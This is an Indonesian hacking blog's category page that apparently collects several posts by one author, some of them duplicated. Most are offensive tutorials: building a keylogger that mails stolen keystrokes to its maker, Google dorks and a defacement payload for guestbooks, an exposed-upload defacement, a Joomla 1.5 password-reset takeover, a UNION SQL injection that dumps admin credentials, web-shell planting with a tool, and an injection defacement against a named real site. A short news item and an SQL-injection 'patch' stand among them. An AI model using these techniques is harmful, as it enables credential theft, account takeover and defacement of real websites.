| ||
| Menurut yang dilaporkan
laman The Next Web, Jumat (29/11/2013), tweet tersebut sempat muncul
selama 13 menit di timeline akun @NokiaNZ. Namun setelah itu tweet yang
dapat menyinggung banyak follower Nokia tersebut menghilang. Kemungkinan
besar pihak Nokia telah menghapusnya.
Akun @NokiaNZ pun langsung mem-posting-kan sebuah tweet lain yang berisikan permohonan maaf kepada seluruh follower yang melihat tweet tak senonoh tersebut. Mereka menuliskan, "Hai semuanya, tidak seperti tweet terakhir tadi, kami mencintai semua fans Nokia. Maaf jika ada yang merasa terganggu, kami sedang menyelidikinya". Hingga kini belum ada penjelasan dari pihak Nokia terkait permasalah tweet kalimat kasar tersebut. Namun sejumlah rumor yang beredar di dunia maya menyebutkan bahwa besar kemungkinan akun Twitter Nokia New Zeland telah menjadi korban peretasan hacker. Akan tetapi tak sedikit pula yang mengira itu adalah perilaku usil karyawan Nokia sendiri. Sumber: Liputan6.com |
Home » Semua post berkategori Hacking
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Jumat, 29 November 2013
Ngetweet Kalimat kasar, Akun Twitter Nokia Diretas?
Jumat, 01 November 2013
Main Linux via Online
Pernahkan anda mencoba OS lain di dalam OS biasanya memakai VMware dll.
pastinya memakan memory yang cukup GEDE :v
kebayang gak ada VM online..??? ada kok ni jawabannya www.koding.com
di sini kamu bisa buat website dengan domain www.blablabl.ko.io ini domain gratisan yang disediakan oleh koding.com tapi juga bisa diganti kok dengan domainmu. Perlu di ingat koding.com mirip dengan server halayak server lokal, jadi misalkan ente On yang pasti server juga On alias alamat webmu pasti bisa di akses oleh semua orang tapi kalau kamu Off server juga Off ngerti kan maksudnya, yang gak ngerti EGP :v
*Anggap aja ente sudah daftar untuk mencoba Linux langsung pilih Develop kemudian pilih Terminal tunggu hingga loadiing dan koneksi berhasil.
Berikut SSnya

Kemudian Upload deh program Perl, Python, Ruby etc. yang sering maenan Linux pasti ngerti ya pastinya harus faham Commands Linux.
*Untuk Pembuatan website silakan Upload filemu di folder Web
*Install Mysql juga bisa langsung klik Develop pilih Get More App dan Pilih MySql Installer berikut SSnya
*Untuk Google Crome juga tersedia addon nya silakan klik link ini https://chrome.google.com/webstore/detail/terminal/kogcfmeennoidocadkgjhnbancebmlbf
Bagaimana tertarik kan, Tidak hanya itu disini kita bisa saling komunikasi dengan member-member lainya. Sebenarnya masih banyak lagi kegunaanya tapi keburu waktu mepet terpaksa ane post yang penting-penting doank, Oke semoga bermanfaat.
pastinya memakan memory yang cukup GEDE :v
kebayang gak ada VM online..??? ada kok ni jawabannya www.koding.com
di sini kamu bisa buat website dengan domain www.blablabl.ko.io ini domain gratisan yang disediakan oleh koding.com tapi juga bisa diganti kok dengan domainmu. Perlu di ingat koding.com mirip dengan server halayak server lokal, jadi misalkan ente On yang pasti server juga On alias alamat webmu pasti bisa di akses oleh semua orang tapi kalau kamu Off server juga Off ngerti kan maksudnya, yang gak ngerti EGP :v
*Anggap aja ente sudah daftar untuk mencoba Linux langsung pilih Develop kemudian pilih Terminal tunggu hingga loadiing dan koneksi berhasil.
Berikut SSnya

Kemudian Upload deh program Perl, Python, Ruby etc. yang sering maenan Linux pasti ngerti ya pastinya harus faham Commands Linux.
*Untuk Pembuatan website silakan Upload filemu di folder Web
*Install Mysql juga bisa langsung klik Develop pilih Get More App dan Pilih MySql Installer berikut SSnya
*Untuk Google Crome juga tersedia addon nya silakan klik link ini https://chrome.google.com/webstore/detail/terminal/kogcfmeennoidocadkgjhnbancebmlbf
Bagaimana tertarik kan, Tidak hanya itu disini kita bisa saling komunikasi dengan member-member lainya. Sebenarnya masih banyak lagi kegunaanya tapi keburu waktu mepet terpaksa ane post yang penting-penting doank, Oke semoga bermanfaat.
Lutfi rahman
Dunia,
Hacking,
Info,
Internet,
IT,
Pengetahuan,
Teknologi,
Tips dan Trik,
Tutorial
Sabtu, 02 Februari 2013
Vb 6.0 : Membuat Trojan Keylogger ( Hacking with Trojan )
Baik mari kita mulai merambah ke dunia pemrograman, untuk posting pertama tentang pemrograman ini saya akan memberikan panduan untuk membuat trojan keylogger, SOURCE CODE INI MASIH BUTUH PENGMBANGAN DAN SUDAH AUS DI MAKAN USIA, TAPIIIIIIII MASIH BERFUNGSI DENGAN BAIK KOK. CUMAN YA UDAH DI CIUMIN SAMA MBAK AVIRA AJA, KATANYA "AWAS TROJAAAAANNNN !!!" GITU CAIAAAAANNNNKKKKKKK.....
adapun hal-hal yang harus anda siapkan antara lain
PC dengan System Operasi Windows ( XP atau apa lah terserah yang penting masih men-support VB 6.0 )
Microsoft Visual Basic 6.0 ( kalo belum punya ya instal dulu lah dodolllll )
Pacul, Sabit, Krenjang dan Linggis ( Hoy Hoy nih bukan mau ngegarap sawah )
Tekad dan niat aja, ente ndak perlu pinter untuk bisa berkarya!!!!!!!!
Apa aja sih yang perlu anda pahami terlebih dahulu ????????
Pertama SMTP : atau sSimple Mail Transfer Protokol adalah sebuah jalur dalam jaringan network yang bertugas mengurusi segala bentuk pengiriman email, baik dari atau menuju server, dia menggunakan port 25, untuk mengetahui apakah SMTP dari sebuah jaringan open / tidak lakukan telnet server dengan cara
masuk ke cmd.exe dan ketikan perintah
Telnet [ip target] [25]
c:\>Telnet 192.898.098.23 25
biasanya kalau open ( mengizinkan pemakaian jalur tersebut untuk mengirimkan email tanpa password ) akan ada report jawaban "Hello" dan sejenisnya, coba2 sendiri lah saya lum ada waktu nyari contoh capture nya.
Kedua : Input yang di rekam oleh keylogger, pada dasarnnya Keylogger berarti .....
Key : Tombol , dalam hal ini tentu saja tombol keyboard
Log : adalah brankas penyimpanan berupa file berekstensi .txt atau .log
jadi keylogger adalah sebuah malware yang berfungsi merekam input yang di pencet oleh keyboard dan menyimpan hasil nya di sebuah file di tempat tersembunyi......kemudian suatu saat tertentu, file log tersebut akan di kirimkan ke email si pembuat via SMTP mail tadi lah,
Log file tersebut bisa berisi ketikan-ketikan huruf yang telah di input korban, kebanyakan pasti kata-kata yang ndak berguna, tapi bisa jadi suatu saat menyimpan password , karena waktu korban login ke apa kek , yahoo, facebook, atau login ke kamar mandi ( hayah ) dia pasti ngetik username dan password nya......bahaya banget kalo korban adalah seorang bisnis manager, pasti dia akan mengerjakan banyak data tentang perusahaan dan keuangan, termasuk PIN kartu kredit ( kali aja loh ndak jamin soalnya )
intinya SAYA BISA JADI HACKER ( nah lo, niat lu aja udah jelek kok, jangan lahhhh.....ini cuman belajar bro.....ndak boleh nakal ya ^_^ )
Setelah semua Di siapkan , buka Visual Basic 6.0 lalu buat 1 Project RUNDLL32 dengan isi sebagai berikut :
1. Satu buah form dengan komponen = 1 label, 3 text box, 2 buah timer, 1 buah SMTP ( nanti ada di user control )
2. Dua buah module dengan nama Internet dan Module 1.
3. Satu buah User Control dengan nama SMTP ( dengan satu komponen Winshock )
Kira-kira seperti ini lah model Project Explorer nya :
Nah jika udah selesai, tinggal memasukan kode aja deh, untuk lebih jelas silahkan download source code nya di sini : Keylogger Code
Di sana sudah saya berikan beberapa panduan dalam line komentar, moga aja ndak bingung, tapi intinya begitu lah, contoh :
Pada Form1
Di sana bagian paling vital adalah tempat anda meletakan SMTP Gratis Sekaligus Portnya, silahkan cari sendiri deh Free SMTP nya, punya saya udah kena Backlist. s1.go.ro dengan port 25 adalah SMTP dari tutorial awal, saya ndak kasih perubahan apa2, yang jelas itu udah ndak bisa di pake.
Pada Module Internet
Modul itu berfungsi untuk melakukan chek pada internet connection di komputer korban, jadi gunanya adalah melakukan testing pada sambungan akses, ia mengirimkan request koneksi ke www.google.com
Pada Module 1
Di sana terdapat banyak kode yang berfungsi untuk menangkap input dari keyboard, yah namanya juga keylogger, udah saya jelaskan definisinya di atas situ..... semua yang di tekan keyboard akan terekam di logs file nya, lalu di kirim ke email tujuan ( milik pembuat keylog ) melalui SMTP gratis yang masih Open. ( sebenarnya bisa menggunakan SMTP berpassword seperti milik gmail, tapi bahayanya, kalau keylogger buatan ente berhasil di crack oleh hacker, maka password anda akan ketauan n keylog ini bisa jadi pagar makan tanaman atau senjata makan tuan, makanya kita menggunakan free SMTP yang ndak berpassword )
Pada User Control SMTP
Wes lah, pada dasarnya user control adalah komponen tambahan dari VB 6.0 yang masih berbentuk kode mentah, (yang mateng pasti berekstensi .ocx atau .dll ) inilah yang membuat keylog bisa di buat secara portabel tanpa melakukan package terlebih dahulu. pada user control ini kita akan melihat banyak sekali kode yag berfungsi untuk mengatur sambungan ke server mail, misalkan apa saja yang akan di kirimkan, apa saja alat pengirimanya, dan data mana yang harus di ambil untuk di transfer ke email. intinya gitu lah.
Udah ya, capek ngetik mulu, download aja kode keylogger nya di sini. yang perlu anda edit hanyalah bagian alamat SMTP gratis, Port yang di gunakan, serta alamat email tujuan pengiriman data.
selamat mencuri data penting orang lain ya dan selamat di penjara kalau ketahuan hahahahaha
Weleh nih SC di credit kan pada :
1. whinshock.com ( dak tau salah pa bener tuh domainya )
2. jasakom
3. X-code forum
4. Joex Securityonline
Minggu, 06 Januari 2013
Apa itu CSRF (Cross-site Request Forgery)
CSRF (Cross-site Request Forgery) merupakan suatu teknik hacking
untuk mendapatkan atau bahkan menguasai suatu account dengan cara
menyerang web yang dieksekusi atas wewenang korban, tanpa
dikehendakinya.
CSRF merupakan teknik pemalsuan permintaan yang berasal dari halaman web atau situs yang berbeda, saat halaman situs dieksekusi oleh korban maka akan muncul account baru yang tanpa dikehendaki si admin.
Celah keamanan banyak di temukan di berbagai CMS, contohnya CMS VCalendar.

Penulis buat sebuah cerita agar mudah di mengerti, ada seorang admin memiliki situs yang dibangun dengan VCalendar, suatu saat dia login ke halaman administrator.

Setelah si admin login dan masuk ke menu pilihan user maka akan tampil para user di situs tersebut.

Terlihat ada 3 buah account, pada saat itu juga diminta oleh seseorang temannya untuk membuka suatu halaman situs.

Saat admin melakukan klik tiba-tiba muncul halaman daftar user untuk login.

Dengan ditambahnya user secara otomatis ke halaman administrator, maka temannya si admin yang menjebak dapat melakukan login dengan account tersebut.
CSRF merupakan teknik pemalsuan permintaan yang berasal dari halaman web atau situs yang berbeda, saat halaman situs dieksekusi oleh korban maka akan muncul account baru yang tanpa dikehendaki si admin.
Celah keamanan banyak di temukan di berbagai CMS, contohnya CMS VCalendar.
Penulis buat sebuah cerita agar mudah di mengerti, ada seorang admin memiliki situs yang dibangun dengan VCalendar, suatu saat dia login ke halaman administrator.
Setelah si admin login dan masuk ke menu pilihan user maka akan tampil para user di situs tersebut.
Terlihat ada 3 buah account, pada saat itu juga diminta oleh seseorang temannya untuk membuka suatu halaman situs.
Saat admin melakukan klik tiba-tiba muncul halaman daftar user untuk login.
Dengan ditambahnya user secara otomatis ke halaman administrator, maka temannya si admin yang menjebak dapat melakukan login dengan account tersebut.
Sabtu, 11 Agustus 2012
Hack Buku Tamu
berikut langkahnya:
1. Dork inurl:guesbook.php <<<< terserah anda di edit model gimana :D
2. pilih salah satu target dan saya mencoba target berikut gambarnya maaf saya tidak menyertakan link atau alamat target dengan alasan Privacy.
3. Isikan data diri yang pasti data diri palsu yaaaa terserah anda lah.
4. di kolom "Pesan" isikan script yang sudah saya edit agar tampilan tidak seperti di screenshoot yang saya pampang. berikut scriptnya di bawah ini :
</DIV><DIV align=left><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><center><br><img border="0" src="http://3.bp.blogspot.com/-QNG-ymQX7DE/T_jFaeh2TDI/AAAAAAAAOko/Y6KFEyXC_CE/s400/Hacker.jpg" width="473" height="253"><br><br><br><font face="Arial" color="#339999" size="6"><strong>1nd0n3s14 H4ck3r</strong></font><br><br><embed src="http://www.selbys.com/images/shotgun.swf" width="191" height="252"></embed><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Special Thank's<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">kosong8<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Dedicated All Crew<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Surabayahacker - Balikita - Cyber AE - All Indonesia Hacker<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Hey admin......do you a need help ?<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Dont Panic</font><br><br><br><strong><font face="Arial" size="6" color="#339999"><marquee width="30%">I Love Your Site !!! </marquee></font></strong></DIV></DIV>
4. Kirim/Submit pokonya apa aja tombol pengirim di bukut tamu tersebut :D dan SELESAI lihat hasilnya
PERINGATAN:TUTORIAL INI BUKAN UNTUK DI SALAH GUNAKAN, JIKA ADA RESIKO YANG MENANGGUNG ANDA DALAM MENYALAH GUNAKAN TUTORIAL INI, PENUSLIS TIDAK BERTANGGUNG JAWAB.
COPAS: HARAP IZIN DAN MEMBERIKAN CREDIT ATAU SEMACAMNYA
Lutfi rahman
Hacking
Selasa, 17 Juli 2012
Cara Mengindari SQL Injection dengan Patch Bug
jika kamu adalah seorang admin,webmaster di suatu website . . .
pasti kamu ingin menangkalserangan ini…ane akan beri sedikit trick untuk menangkal Sql Injection
sebaiknya,sebelum kamu meng-upload situs anda, uji coba dulu keamanan na menggunakan tools seperti N-stealth keamanan scanner, Acuenetix Ltd’ s web Vulnerability scanner, Jsky Vuln Scaner dan SPi Dynamics Weblnspect
untuk versi gratis,bisa menggunakan Nikto
untuk Jsky Vuln Scaner
software diatas bisa di cari dipasar ( google )
ok lanjutt
jika udah di coba menggunakan software diatas, dan ketemu bug ,cari dimana letak nya, misalnya Url ini
Http://Yoursite/index.php?id=9
apabila ane tambahkan petik ‘ , terlihat error SQL .berarti bug na terletak di bagian index.php
sekarang coba lu download dulu script berikut ini :
http://www.ziddu.com/download/15763432/scriptpachtsql.txt.html
simpan file dengan nama patch.php , Etss Jangan Lupa , Tulisan Yg Berwarna Merah Ituh Diganti Dengan URL YANG KAMU INGINKAN ..
dan jangan lupa simpan file itu dengan 1 folder index.php ( ga tau kenapa )
jika sudah , lu dapat membuka file index.php dan menambahkan :
include'patch.php;
inti dari perintah di atas adlh ketika lu mengakses Http://Yoursite/index.php?id=9 dan menambahkan syntax (*‘ ) na, maka otomatis akan di alihkan ke URL YANG ELU MASUKIN TADI ( bole juga ke jebakan betmen, biar kapok tu orang )
mungkin code diatas sangat sederhana.
tetapi sangat membantu untuk melakukan patch pada bug SQL
tutorial diatas saya tulis pakai tangan sendiri
makasi
Sumber : http://infokawan.com/2011/07/cara-mengindari-sql-injection-dengan-patch-bug/
Lutfi rahman
Hacking
Cara Mengindari SQL Injection dengan Patch Bug
jika kamu adalah seorang admin,webmaster di suatu website . . .
pasti kamu ingin menangkalserangan ini…ane akan beri sedikit trick untuk menangkal Sql Injection
sebaiknya,sebelum kamu meng-upload situs anda, uji coba dulu keamanan na menggunakan tools seperti N-stealth keamanan scanner, Acuenetix Ltd’ s web Vulnerability scanner, Jsky Vuln Scaner dan SPi Dynamics Weblnspect
untuk versi gratis,bisa menggunakan Nikto
untuk Jsky Vuln Scaner
software diatas bisa di cari dipasar ( google )
ok lanjutt
jika udah di coba menggunakan software diatas, dan ketemu bug ,cari dimana letak nya, misalnya Url ini
Http://Yoursite/index.php?id=9
apabila ane tambahkan petik ‘ , terlihat error SQL .berarti bug na terletak di bagian index.php
sekarang coba lu download dulu script berikut ini :
http://www.ziddu.com/download/15763432/scriptpachtsql.txt.html
simpan file dengan nama patch.php , Etss Jangan Lupa , Tulisan Yg Berwarna Merah Ituh Diganti Dengan URL YANG KAMU INGINKAN ..
dan jangan lupa simpan file itu dengan 1 folder index.php ( ga tau kenapa )
jika sudah , lu dapat membuka file index.php dan menambahkan :
include'patch.php;
inti dari perintah di atas adlh ketika lu mengakses Http://Yoursite/index.php?id=9 dan menambahkan syntax (*‘ ) na, maka otomatis akan di alihkan ke URL YANG ELU MASUKIN TADI ( bole juga ke jebakan betmen, biar kapok tu orang )
mungkin code diatas sangat sederhana.
tetapi sangat membantu untuk melakukan patch pada bug SQL
tutorial diatas saya tulis pakai tangan sendiri
makasi
Sumber : http://infokawan.com/2011/07/cara-mengindari-sql-injection-dengan-patch-bug/
Lutfi rahman
Hacking
Deface Mudah aLa CUPU
Assalamualaikum,,
sebeLum nya apa kabar Semuah,,,udah lama gak On Line,,dan Akhir nya saya buat TutoriaL ini..!!
kaLi ini saya mau kasih TutoriaL Deface Web aLa CUPU,,simpLe dan aktraktis Bro..
dan sebenarnya tutorial ini sudah lama sekali dan bagi para master harap out dari artikel ini :D
okeh Langsung ajah Ya:
1. Pertama buka google.com
2. ketikan atau copas aja dork di bawah ini :
inurl:examples/uploadbutton.html
3. klik enter, pilih salah satu situs yang ada
4. klik tulisan Upload
5. UpLoad fiLe html deface anda,,,
6. ntar muncul tulisan di kotak yang persegi panjang ( trus Copy )
7. lalu ( Paste ) pastekan di belakang alamat situs tersebut misalkan
www.target.com/examples/uploadbutton.html Jadi www.target.com/kata yang ada di dalam kotak persegi panjang tadi
Okeh Sekian duLu Ya and Happy Defacing,,,
Lutfi rahman
Hacking
Exploit Web Joomla V1.5
Exploit Web Joomla V1.5
oke, yang kita cari disini adalah joomla versi 1.5
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind
maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm
nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password
tinggal masukin aja deh password yang diinginkan, beres.
oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkanhttp://target.com/administrator
nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.
gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind
maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm
nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password
tinggal masukin aja deh password yang diinginkan, beres.
oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkanhttp://target.com/administrator
nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.
gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!
SAYA TIDAK MENGAJARKAN ANDA HARUS MELAKUKAN KEJAHATAN, NAMUN SAYA HANYA MEMBERIKAN ILMU UNTUK SEBUAH INFORMASI YANG ANDA KETAHUI "DILARANG KERAS MENYALAH GUNAKAN TUTORIAL INI"
Lutfi rahman
Hacking
Tutorial SQL Injection langkah demi langkah
Trik lama namun apa salahnya saya Posting bagi yang belum tau :D
Code:
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
trus yg saya dapat :
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
Code:
http://www.victim.com/detailproduct.php?id=75'
ternyata ada bug-nya, muncul pesan error :
Code:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1
Untuk mencari column gunakan perintah [ order by ]
Code:
http://www.victim.com/detailproduct.php?id=75 order by 1--
dimulai dengan angka 1, selanjutnya 2, dst sampai muncul pesan error
pada target kita kali ini, error muncul pada angka 19
Code:
http://www.victim.com/detailproduct.php?id=75 order by 19--
muncul pesan error:
Unknown column '19' in 'order clause'
jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)
Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75
akan muncul "angka ajaib" : 3, 11 dan 18
kita pilih salah satunya saja, misal 3
trus kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
muncul tulisan :
5.0.90-community
wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :p
nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema,
dimana information_schema tidak terdapat pada database MySql versi 4. Jadi kalau targetnya mempunyai database MySQL versi 4,
yang kita lakukan yaitu menebak-nebak tablenya... lol
Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib
dan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--
akan muncul nama-nama table :
Code:
login,tbanner,tcatprod,tproduct,tset
Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--
muncul column : user,pass
untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL
ganti column 1 dengan "user" dan column2 dengan "pass"
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--
1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--
hasil : admin:admin
jadi,
user = admin
password = admin
nb : Jika ada yang mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini http://hashchecker.de/find.html
Selesai ??? belum....wkwkwkwk :p
Langkah selanjutnya adalah mencari Admin Page target kita. Anda bisa menggunakan "adminfinder" atau "scanlink.py"
download di mari : http://www.ziddu.com/download/10386415/InstantSQLI.rar.html
Klo ada yg dapat admin pagenya... tolong jangan di deface, ini hanya untuk pembelajaran saja.
Sumber: acizninja
Cara deface dengan tools buatan Kak Hmei7
kaLi eneh ane mau share Seputar Deface WEB yg paLing simpLe dgn Menggunakan TooLz si mastah hmei7...!!
Wkwkwkwkwkwk
yah itu dia BACKDOOR yang sudah di tanam oleh hmei7 <--- hebat ane salut ama ente !! zone-h pula :* (
ane
)
oke ane kasih atau enggak yah?? sopwarenya >.<
kasih dah atas persetujuan mereka
linknya download disini
cara memakai silahkan extract terlebih dahulu
nanti muncul sopwarenya
cara pakainya.
jalankan aplikasi itu hmei7 tool
Setelah jalan
Step 1 :
klik web dav ---> asp shell maker
Step 2 :
Step3 :
anu anu :menyukai anu anda maksudya itu loh kita tanam shell buatan sendiri wait wait
nih SSnyo
Step4
nah tau kan load file shell from .... cari sendiri ah ogah :cape: kalian yang deface itu contohnya justinisal.html
pokonya terserah rename jadi apa kek yang /Hmei7.asp;.txt jadi hacke.html atau maho.html atau Indonesia.html terserahlah!!.
Step 5 ayo ayo kita nyari target hasil nyolong dari para defacer yang pake tools backdoornya hmei7 ayo
carinya di salah satu userhttp://www.indonesiandefacer.org/
siapa aja boleh ane mintanya ke siapa yah?
Step 6
menuju is-rookit lagi baru ke add sitehttp://soft.tzyz.net/0x0.txt hapus jadihttp://soft.tzyz.net
Click oke dan terus click serang sampai ada tulisan your shell is created http://soft.tzyz.net/0x0.html
Selesai sudah menuju link kalian deh
keren yah :P
tergantung kalau udah di patch ga akan bisa soalnya udah di hapus sama admin site tersebut
Wkwkwkwkwkwk
yah itu dia BACKDOOR yang sudah di tanam oleh hmei7 <--- hebat ane salut ama ente !! zone-h pula :* (
ane
)oke ane kasih atau enggak yah?? sopwarenya >.<
kasih dah atas persetujuan mereka
linknya download disini
cara memakai silahkan extract terlebih dahulu
nanti muncul sopwarenya
SPOILER: HIDE
![[Image: Is-rookit.jpg]](http://i1109.photobucket.com/albums/h424/threadjustinisal/Is-rookit.jpg)
jalankan aplikasi itu hmei7 tool
Setelah jalan
Step 1 :
SPOILER: HIDE
![[Image: step1.jpg]](http://i1109.photobucket.com/albums/h424/threadjustinisal/step1.jpg)
Step 2 :
SPOILER: HIDE
![[Image: step2.jpg]](http://i1109.photobucket.com/albums/h424/threadjustinisal/step2.jpg)
anu anu :menyukai anu anda maksudya itu loh kita tanam shell buatan sendiri wait wait
nih SSnyo
SPOILER: HIDE
![[Image: step3.jpg]](http://i1109.photobucket.com/albums/h424/threadjustinisal/step3.jpg)
Step4
nah tau kan load file shell from .... cari sendiri ah ogah :cape: kalian yang deface itu contohnya justinisal.html
pokonya terserah rename jadi apa kek yang /Hmei7.asp;.txt jadi hacke.html atau maho.html atau Indonesia.html terserahlah!!.
Step 5 ayo ayo kita nyari target hasil nyolong dari para defacer yang pake tools backdoornya hmei7 ayo

carinya di salah satu userhttp://www.indonesiandefacer.org/
siapa aja boleh ane mintanya ke siapa yah?
Step 6
SPOILER: HIDE
![[Image: step6.jpg]](http://i1109.photobucket.com/albums/h424/threadjustinisal/step6.jpg)
Click oke dan terus click serang sampai ada tulisan your shell is created http://soft.tzyz.net/0x0.html
Selesai sudah menuju link kalian deh
keren yah :Ptergantung kalau udah di patch ga akan bisa soalnya udah di hapus sama admin site tersebut
Lutfi rahman
Hacking
Tutorial Attack XSS
halo all :) kali ini flazer mau kasih trik / toturial Deface Palsu via SQL Injection ???
wiihh emang nya bisa ya hmmm ini sih seperti xss saja :D
jadi kita bermain dengan sql injection dulu :)
ok langsung aja ya ^_^
1. siapkan target sql kita dulu ^_^
udah tau kan sql itu gimana ??? kalau gk tau google aja gan
nah sekarang kita dapat target neh :D
http://stmarysjwalapur.com/photo-gallery.php?gallery_id=-11
ok kita coba sql ya gan
http://stmarysjwalapur.com/photo-gallery.php?gallery_id=-11%20union%20select%201,2,3,4,5,6,7,8,9,10--
wahh ternyata ada no togel nya gan heheheh :P
sekarang kita ganti yang no togel saya maksud tadi dengan asci kita ^_^
tahu kan convert asci nya ?? http://www.swingnote.com/tools/texttohex.php
ok sekarang kita coba buat kata ini <h1>Saya Hanya Seorang Lamer I AM NOT HACKER</h1>
nah yang dari <h1> sampai akhir kita coba convert ke asci ^_^ nah kalau sudah kita ambil hex nya jadi nya seperi ini
wiihh emang nya bisa ya hmmm ini sih seperti xss saja :D
jadi kita bermain dengan sql injection dulu :)
ok langsung aja ya ^_^
1. siapkan target sql kita dulu ^_^
udah tau kan sql itu gimana ??? kalau gk tau google aja gan
nah sekarang kita dapat target neh :D
http://stmarysjwalapur.com/photo-gallery.php?gallery_id=-11
ok kita coba sql ya gan
http://stmarysjwalapur.com/photo-gallery.php?gallery_id=-11%20union%20select%201,2,3,4,5,6,7,8,9,10--
wahh ternyata ada no togel nya gan heheheh :P
sekarang kita ganti yang no togel saya maksud tadi dengan asci kita ^_^
tahu kan convert asci nya ?? http://www.swingnote.com/tools/texttohex.php
ok sekarang kita coba buat kata ini <h1>Saya Hanya Seorang Lamer I AM NOT HACKER</h1>
nah yang dari <h1> sampai akhir kita coba convert ke asci ^_^ nah kalau sudah kita ambil hex nya jadi nya seperi ini
3c68313e536179612048616e79612053656f72616e67204c616d6572204920414d204e4f54204841434b45523c2f68313e
sekarang coba kita masukin ke angka togel yang saya maksud tadi
oia jangan lupa kalian tambahin ya 0x hasil hex kita
jadi nya seperti ini
buka ganKLIK DI SINI
nah gimana sekarang :) udah paham kan ^_^
jangan lah menyerah untuk belajar.
Lutfi rahman
Hacking
Cara mendapatkan login detail logs dari Google
Saya bingung mau ngasih judul kayak gimana..
